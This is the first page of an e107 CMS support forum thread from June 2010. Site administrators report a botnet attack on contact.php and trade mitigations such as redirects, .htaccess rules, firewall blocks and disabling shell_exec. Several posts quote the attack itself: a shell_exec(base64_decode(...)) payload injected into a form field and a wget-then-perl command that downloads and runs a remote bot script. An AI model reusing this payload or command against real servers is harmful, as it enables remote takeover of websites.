e107, it's pimp, init?
Home Downloads Forums Misc Bugtracker Documentation/Wiki Plugins Themes Hosting Reviews
Welcome
Username:

Password:


Remember me

[ ]
[ ]
[ ]
e107 Project Tracker
Changelog Changelog | Stats
Bugtracker Bugtracker
     80 open | 5030 total | Stats
Issue tracking (Jira) Issue tracking (Jira)
Feature Requests Feature Requests
     1372 open | 2139 total
SVN Tree SVN Tree
Released Files Released Files
Download Stats Download Stats
How to get SVN version How to get SVN version

e107 on IRC
freenode.net
For real-time help and friendly chat please join #e107 on the Freenode Network

It's a friendly channel so please drop in and say hello regardless of your e107 or IRC experience

If you're new to IRC please click [here] for an explanantion of what to do.

Web Hosting

e107.org :: Forums :: e107 Support :: Core Support   << Previous thread | Next thread >>
Getting attacked
Go to page  [1] 2 3 4 5
Moderators: jalist, McFly, bkwon, streaky, C6Dave, SecretR, steved, bugrain, AndyDev, Hansi64, nlstart
Author Post
Fudsey
Sun Jun 06 2010, 09:37AM
Registered Member #24897
Joined: Thu Feb 16 2006, 04:18PM
Location:
Posts: 69
 		I run 3 e107 websites and on Friday I noticed that one of my sites was getting hammered and I couldn't figure out why. I ended up with a upload total for the day of 178GB(normal is around 200MB). When I logged into my main site this AM it was real slow and I had 20 connections all to the "Contact.php" page, which I don't use.

I though it might have been because I needed to update e107 from .19 to .22 but that didn't help. So I renamed the contact.php and the attack has stopped(for now).

Does anyone have any ideas? Or, has this happened to anyone else? Any answers could be helpful...... Thanks
Back to top
Yakumo
Sun Jun 06 2010, 10:47AM
Registered Member #31165
Joined: Thu Oct 05 2006, 03:48PM
Location:
Posts: 454
 		same thing is happening to me. although it isnt much of a problem for me. i got 500+ bots earlier all at contact.php
Like Anime?
Back to top
Website
Snailman
Sun Jun 06 2010, 10:55AM

Registered Member #39078
Joined: Sat Aug 11 2007, 05:30AM
Location: A Canadian living in Germany
Posts: 28
 		Same situation occurring by me now. click to open link in new window

We have normality. I repeat, we have normality. Anything you still can't cope with is therefore your own problem.

------------------------------

"I drink mainly to sedate the tapeworm"
Back to top
Website
Yakumo
Sun Jun 06 2010, 11:00AM
Registered Member #31165
Joined: Thu Oct 05 2006, 03:48PM
Location:
Posts: 454
 		i searched in google and found some exploits that (i think) is supposed to affect versions 0.7.20 and below. i sent an email to the admins. so i guess try to update to 0.7.22 just to make sure
Like Anime?
Back to top
Website
Snailman
Sun Jun 06 2010, 11:03AM

Registered Member #39078
Joined: Sat Aug 11 2007, 05:30AM
Location: A Canadian living in Germany
Posts: 28
 		I am running 0.7.22 and am getting the same spam attack. I may also rename my contact.php to slow this...

Edit: After renaming contact.php they are slowly dropping off.
            208.113.193.12  is in contact         65.23.154.107 is in contact         78.157.108.97 is in contact         87.106.82.197 is in contact         12.33.10.228 is in contact         174.123.106.194 is in contact         193.9.21.20 is in contact         194.150.248.160 is in contact         195.13.221.178 is in contact         195.210.46.18 is in contact         202.191.37.3 is in contact         208.109.86.45 is in contact         212.116.150.113 is in contact         212.159.7.202 is in contact         212.227.114.68 is in contact         212.227.29.168 is in contact         212.227.29.45 is in contact         213.171.218.166 is in contact         216.120.254.101 is in contact         216.246.2.35 is in contact         217.64.195.229 is in contact         Snap - contact         71.43.100.244 is in contact         72.1.240.89 is in contact         72.52.191.183 is in contact         74.208.16.17 is in contact         77.232.83.2 is in contact         78.138.88.247 is in contact         81.175.61.205 is in contact         82.208.40.225 is in contact         85.12.33.50 is in contact         85.214.74.24 is in contact         87.108.28.195 is in contact         88.148.8.7 is in contact         88.213.130.60 is in contact         89.107.186.233 is in contact         89.108.67.73 is in contact         91.198.106.12 is in contact


[ Edited Sun Jun 06 2010, 11:09AM ]
We have normality. I repeat, we have normality. Anything you still can't cope with is therefore your own problem.

------------------------------

"I drink mainly to sedate the tapeworm"
Back to top
Website
fecnnews
Sun Jun 06 2010, 11:27AM

Registered Member #49298
Joined: Fri Jan 16 2009, 12:41PM
Location: Florida
Posts: 134
 		I too am getting a LOT of traffic to a site we normally do not have much at looking at contact.php page. I own the server so I checked my email logs and such and they look normal (nothing going out of the mail server)... Looks like a group of Hackers may be trying to learn some sort of Exploit in the contact page but email isnt going out from them.
--
It's all about Community!
Back to top
MikeNL
Sun Jun 06 2010, 12:07PM
Registered Member #46452
Joined: Thu Jul 24 2008, 03:50PM
Location: The Netherlands
Posts: 62
 		My main site just have been compromized too!

Don't know where they've entered.. but suddenly apache is starting a shell script:

    apache   12345  0.0  0.2   3944   564 ?        S    16:40   0:00 sh -c wget http : //zuo podgorz org/zuo/shb.pl -O /tmp/bo;perl /tmp/bo apache   12346  0.0  0.7  31112  1856 ?        S    16:40   0:00 wget http : //zuo podgorz org/zuo/shb.pl -O /tmp/bo


and then it keeps starting an apache progress called 'rocknrollaaaa'
haven't found that one yet

When I keep all my config as it were but only remove my main site from the 'sites-enabled' folder, everything is ok... so I suppose it has to be somthing to do with that site

[ Edited Sun Jun 06 2010, 12:10PM ]
Back to top
Website
septor
Sun Jun 06 2010, 12:27PM

Registered Member #37
Joined: Sun Aug 11 2002, 05:20AM
Location:
Posts: 700
Member Of The e107 Support Team
 		Open notepad (or whatever).

Create a new file.

Paste:
    <?php header("location:http://google.com/"); ?>


Save that as contact.php and upload/overwrite your existing contact.php file. This will send all traffic trying to locate your contact.php file to Google, which will more than likely have the means to deal with the traffic, plus locate those responsible (unlikely).

Alternatively, you can just comment out the existing contact.php file and add the above header() call:

    <?php /* + ----------------------------------------------------------------------------+ |     e107 website system | |     ©Steve Dunstan 2001-2002 |     <a href="http://e107.org" ><img src='http://e107.org/e107_themes/lamb/images/link.png' style='border:0;' alt='click to open link in new window' /></a> |     <a rel='external' href='javascript:window.location="mai"+"lto:"+"jalist"+"@"+"e107.org";self.close();' onmouseover='window.status="mai"+"lto:"+"jalist"+"@"+"e107.org"; return true;' onmouseout='window.status="";return true;'><img src='http://e107.org/e107_themes/lamb/images/email.png' style='border:0;' alt='click to send email' /></a> | |     Released under the terms and conditions of the |     GNU General Public License (http://gnu.org). | |     $Source: /cvs_backup/e107_0.7/contact.php,v $ |     $Revision: 11346 $ |     $Date: 2010-02-17 13:56:14 -0500 (Wed, 17 Feb 2010) $ |     $Author: secretr $ +----------------------------------------------------------------------------+ */ header("location:http:// www.google.com");/* require_once("class2.php");     // security image may be disabled by removing the appropriate shortcodes from the template.         require_once(e_HANDLER."secure_img_handler.php");         $sec_img = new secure_image; require_once(HEADERF); if (!$CONTACT_FORM) {         if (file_exists(THEME."contact_template.php")) {                 require_once(THEME."contact_template.php");         } else {                 require_once(e_THEME."templates/contact_template.php");         } } if(isset($_POST['send-contactus'])){         $error = "";         $sender_name = $tp->toEmail($_POST['author_name'],TRUE,"rawtext");         $sender = check_email($_POST['email_send']);         $subject = $tp->toEmail($_POST['subject'],TRUE,"rawtext");         $body = $tp->toEmail($_POST['body'],TRUE,"rawtext"); // Check Image-Code     if (isset($_POST['rand_num']) && !$sec_img->verify_code($_POST['rand_num'], $_POST['code_verify']))         {                 $error .= LANCONTACT_15."\\n";         } // Check message body.         if(strlen(trim($_POST['body'])) < 15)         {                 $error .= LANCONTACT_12."\\n";     } // Check subject line.         if(strlen(trim($_POST['subject'])) < 2)         {                 $error .= LANCONTACT_13."\\n";     }         if(!strpos(trim($_POST['email_send']),"@"))         {                 $error .= LANCONTACT_11."\\n";     } // Check email address on remote server (if enabled).         if ($pref['signup_remote_emailcheck'] && $error == "")         {                 require_once(e_HANDLER."mail_validation_class.php");                 list($adminuser,$adminhost) = split ("@", SITEADMINEMAIL);                 $validator = new email_validation_class;                 $validator->localuser= $adminuser;                 $validator->localhost= $adminhost;                 $validator->timeout=3;                 //        $validator->debug=1;                 //        $validator->html_debug=1;                 if($validator->ValidateEmailBox($sender) != 1)                 {                         $error .= LANCONTACT_11."\\n";                 }         } // No errors - so proceed to email the admin and the user (if selected).     if(!$error)         {                 $body .= "\n\nIP:\t".USERIP."\n";                 if(USER)                 {                         $body .= "User:\t#".USERID." ".USERNAME."\n";                 }                 if(!$_POST['contact_person'] && isset($pref['sitecontacts'])) // only 1 person, so contact_person not posted.                 {                     if($pref['sitecontacts'] == e_UC_MAINADMIN)                         {                         $query = "user_perms = '0' OR user_perms = '0.' ";                         }                         elseif($pref['sitecontacts'] == e_UC_ADMIN)                         {                                 $query = "user_admin = 1 ";                         }                         else                         {                                 $query = "FIND_IN_SET(".$pref['sitecontacts'].",user_class) ";                         }                 }                 else                 {                       $query = "user_id = ".intval($_POST['contact_person']);                 }             if($sql -> db_Select("user", "user_name,user_email",$query." LIMIT 1"))                 {                     $row = $sql -> db_Fetch();                     $send_to = $row['user_email'];                         $send_to_name = $row['user_name'];                 }             else                 {                     $send_to = SITEADMINEMAIL;                         $send_to_name = ADMIN;                 }             require_once(e_HANDLER."mail.php");                  $message =  (sendemail($send_to,"[".SITENAME."] ".$subject, $body,$send_to_name,$sender,$sender_name)) ? LANCONTACT_09 : LANCONTACT_10;             if(isset($pref['contact_emailcopy']) && $pref['contact_emailcopy'] && $_POST['email_copy'] == 1){                         sendemail($sender,"[".SITENAME."] ".$subject, $body,ADMIN,$sender,$sender_name);             }             $ns -> tablerender('', $message);                 require_once(FOOTERF);                 exit;     }         else         {                 require_once(e_HANDLER."message_handler.php");                 message_handler("P_ALERT", $error);         } } if(SITECONTACTINFO && $CONTACT_INFO) {         $text = $tp->parseTemplate($CONTACT_INFO, TRUE, $contact_shortcodes);         $ns -> tablerender(LANCONTACT_01, $text,"contact"); } if(isset($pref['sitecontacts']) && $pref['sitecontacts'] != 255) {         require_once(e_FILE."shortcode/batch/contact_shortcodes.php");         $text = $tp->parseTemplate($CONTACT_FORM, TRUE, $contact_shortcodes);         if(trim($text) != "")         {                 $ns -> tablerender(LANCONTACT_02, $text, "contact");         } } require_once(FOOTERF); exit; */ ?>


Using the above method, my site went from having 22 guests (usually 0, sometimes 1 or 2 if I've just released a plugin) down to 6 (as of a few minutes ago).

[ Edited Sun Jun 06 2010, 12:28PM ]
Security issue? e107 security is here to help.

My e107 related scripts can now be found on GitHub. Use at your own risk.
Public ready scripts will be pushed to plugins.e107 only.
Back to top
Website
fecnnews
Sun Jun 06 2010, 12:42PM

Registered Member #49298
Joined: Fri Jan 16 2009, 12:41PM
Location: Florida
Posts: 134
 		Our servers are setup pretty strict security wise, But; there seems to be some group effort from many IP addresses (or anonymous proxies) to get access to upload a file and or LOOK for a file at the websites root public_html section. LOTS of queries for ./help_us.php which is course is not part of the E107 system as it is.

This file: help_us.php MAY be something to look at in your site to see if it exists (planted there) and REMOVE IT if you find it.
--
It's all about Community!
Back to top
knesz
Sun Jun 06 2010, 04:41PM
Registered Member #56419
Joined: Sun Jun 06 2010, 04:32PM
Location:
Posts: 1
Snailman wrote ...

I am running 0.7.22 and am getting the same spam attack. I may also rename my contact.php to slow this...

Edit: After renaming contact.php they are slowly dropping off.
            208.113.193.12  is in contact         65.23.154.107 is in contact         78.157.108.97 is in contact         87.106.82.197 is in contact         12.33.10.228 is in contact         174.123.106.194 is in contact         193.9.21.20 is in contact         194.150.248.160 is in contact         195.13.221.178 is in contact         195.210.46.18 is in contact         202.191.37.3 is in contact         208.109.86.45 is in contact         212.116.150.113 is in contact         212.159.7.202 is in contact         212.227.114.68 is in contact         212.227.29.168 is in contact         212.227.29.45 is in contact         213.171.218.166 is in contact         216.120.254.101 is in contact         216.246.2.35 is in contact         217.64.195.229 is in contact         Snap - contact         71.43.100.244 is in contact         72.1.240.89 is in contact         72.52.191.183 is in contact         74.208.16.17 is in contact         77.232.83.2 is in contact         78.138.88.247 is in contact         81.175.61.205 is in contact         82.208.40.225 is in contact         85.12.33.50 is in contact         85.214.74.24 is in contact         87.108.28.195 is in contact         88.148.8.7 is in contact         88.213.130.60 is in contact         89.107.186.233 is in contact         89.108.67.73 is in contact         91.198.106.12 is in contact



Looks like there has been some massive botnet scan worldwide.
I am admin of one of the server, hosting 400+ sites, but only one of them have installed e107, which is currently suspended.
I did some quick analyse, and there is pearl script behind, generated by apache user, which is reporting activity to irc botnet. Attacks to my server started at about 12UTC.
BTW, one ov the IP-s listed above is my

Just for the info
Back to top
Yakumo
Sun Jun 06 2010, 10:40PM
Registered Member #31165
Joined: Thu Oct 05 2006, 03:48PM
Location:
Posts: 454
 		looks like they stopped now
Like Anime?
Back to top
Website
Nowwhat
Mon Jun 07 2010, 12:33AM

Registered Member #38024
Joined: Thu Jul 05 2007, 02:08PM
Location: Lost in the south of France
Posts: 1208
Member Of The e107 Support Team
 		Stopped ?

My apache error log files is full with these lines :

[Mon Jun 07 00:00:04 2010] [error] [client w.y.z.w] [host www.papy-team.fr] script not found or unable to stat: /homez.46/papyteam/www/forum/help_us.php

About 15 000 only this night !!!!!

I redirected them now with :
RewriteCond %{REQUEST_URI} /forum/help_us.php
RewriteRule ^(.*) http://%{SERVER_NAME}
in my root .htacces

[ Edited Mon Jun 07 2010, 12:37AM ]
Knowing where you are helps if you want to know where to go.
Back to top
Website
C6Dave
Mon Jun 07 2010, 01:30AM
AKA 2dopey

Registered Member #9506
Joined: Sat Jul 31 2004, 02:57AM
Location: North East UK
Posts: 9298
fecnnews wrote ...

Our servers are setup pretty strict security wise, But; there seems to be some group effort from many IP addresses (or anonymous proxies) to get access to upload a file and or LOOK for a file at the websites root public_html section. LOTS of queries for ./help_us.php which is course is not part of the E107 system as it is.

This file: help_us.php MAY be something to look at in your site to see if it exists (planted there) and REMOVE IT if you find it.

Making sure you have a dedicated 404.html error page set up will stop the multiple database hits slowing the site down for a non existent file

If you have cPanel access on your server it's listed in 'error pages' and you need to add something like:

    <!--#echo var="REMOTE_ADDR" --><!--#echo var="REQUEST_URI" -->I'm sorry but you the file you have requested does not exist <br />Please check your syntax and try again.' <!-- --><!-- -->


For each site in the 404 section
"The irony of the Information Age is that it has given new respectability to uninformed opinion" - John Lawton 1995
Back to top
Website
Yakumo
Mon Jun 07 2010, 03:01AM
Registered Member #31165
Joined: Thu Oct 05 2006, 03:48PM
Location:
Posts: 454
 		i spoke too soon, theyre at it again lol.
Like Anime?
Back to top
Website
TheMadMonk
Mon Jun 07 2010, 06:02AM

Registered Member #2131
Joined: Wed Jul 02 2003, 06:20AM
Location: UK
Posts: 101
 		yeah my site is being attacked like this too..... s
-=TheMadMonk=- Visit http://www.gamingmad.com
Back to top
Website
Tansas
Mon Jun 07 2010, 06:19AM

Registered Member #22982
Joined: Mon Dec 12 2005, 11:22AM
Location: bonn
Posts: 698
 		Stopped ?

my site is unde attack - bnut i have to update from V0.20 to V.022
My e107 Projects: Istanbul - Pharmazie -Gesundheit -Istanbul Guide -
Back to top
Website
TheMadMonk
Mon Jun 07 2010, 06:22AM

Registered Member #2131
Joined: Wed Jul 02 2003, 06:20AM
Location: UK
Posts: 101
 		i'm on .022 still attacked, changing or removing contact.php looks the way to go atm
-=TheMadMonk=- Visit http://www.gamingmad.com
Back to top
Website
DJBob
Mon Jun 07 2010, 06:24AM
Registered Member #56445
Joined: Mon Jun 07 2010, 06:19AM
Location:
Posts: 1
 		I've had a site attacked by this as well. I've looked into it and although the access log is showing the Russian IP's trying to get help_us.php (which doesn't exist) somehow apache is serving contact.php.

I put some logging on that file separately and found that they where posting the following into the author_name POST var:

[php]shell_exec(base64_decode(\" d2dldCBodHRwOi8venVvLnBvZGdvcnoub3JnL3p1by9zaGIucGwgLU8gL3RtcC9ibztwZXJsIC90bXAvYm8=\"));;die();[/php]

The encode bit translates to:

wget click to open link in new window -O /tmp/bo;perl /tmp/bo

I've solved it by not allowing PHP to run shell_exec but it seems that the real solution is to fix the exploit in the contact page.
Back to top
Mojo Will
Mon Jun 07 2010, 06:58AM

Registered Member #31550
Joined: Wed Oct 18 2006, 05:03PM
Location: England UK
Posts: 458
 		With your firewalls on hosting

Deny incoming from 174.136.96.138 on all ports
Deny outgoing to 174.136.96.138 on all ports

this will stop the remote perl being done then kill all PIDs with that as the command, if not it will hijack your httpd with rocknrollaaaa

finally think i sorted out my server by adding better security. thanks to Cam for his help on IRC
Mostly Mojo
Premium Marketing, Design and Development
xenthemes.com
Want some proper themes? xenthemes have them!
@theMojoWill
Follow me on Twitter
Back to top
Website
ChicksHateMe
Mon Jun 07 2010, 07:19AM
Registered Member #14644
Joined: Mon Feb 14 2005, 06:20PM
Location: Leominster, MA USA
Posts: 453
 		I am here to join in too.

I have this happening, Seems the only files affected for me were index.php in the admin and root.

I disabled my contacts.php I had been getting a lot of undeliverables for an email, thought it was just stolen.

I have some sites as far back as 7.11

Anyone know if there are a lotta steps to going from 7.11 to current? Or maybe I should just wait for.23

You'd think these hacks would go after the big ppl and money, not us poor peeps geesh.

good luck all.

I am SOOOO old, I still do all my graphic designs on the original Lite-brite.
Back to top
Go to page  [1] 2 3 4 5

Jump:     Back to top
Syndicate this thread: rss 0.92 Syndicate this thread: rss 2.0 Syndicate this thread: RDF
Powered by e107 Forum System


All product names mentioned herein are the trademarks of their respective owners. In addition, images, logos, pictures or other material may be trademarks or registered trademarks of their respective owners. Emote images by seb, released under the GPL licence.
Bug Tracking Software
Render time: 0.3994 sec, 0.1755 of that for queries. Memory Usage: 4,023kB